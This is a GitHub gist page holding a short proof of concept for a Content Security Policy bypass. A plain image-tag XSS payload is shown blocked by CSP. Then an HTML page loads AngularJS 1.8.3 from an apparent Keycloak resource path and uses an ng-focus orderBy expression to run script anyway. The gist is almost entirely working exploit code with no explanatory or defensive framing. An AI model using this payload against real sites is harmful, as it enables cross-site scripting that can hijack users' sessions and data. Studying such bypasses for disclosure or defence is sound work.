Created
November 17, 2024 20:53
-
-
Save Xib3rR4dAr/b714400a939b39d4f2d4ba4a33d13eb8 to your computer and use it in GitHub Desktop.
Revisions
-
Xib3rR4dAr created this gist
Nov 17, 2024 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,33 @@ blob://example.com/3dfab3bd-a892-4448-92c3-de92d8eed2ea ``` <img src=x onerror=alert(1)> ``` ``` Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present. ``` angular.min.js ```js /* AngularJS v1.8.3 (c) 2010-2020 Google LLC. http://angularjs.org License: MIT */ (function(z)... ``` PoC: ```html <html> <head> <meta charset="utf-8"> <script src="https://example.com/auth/resources/dm3bk/common/keycloak/node_modules/angular/angular.min.js"></script> </head> <body> <div ng-app> <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([112233],alert)'"> </div> </body> </html> ```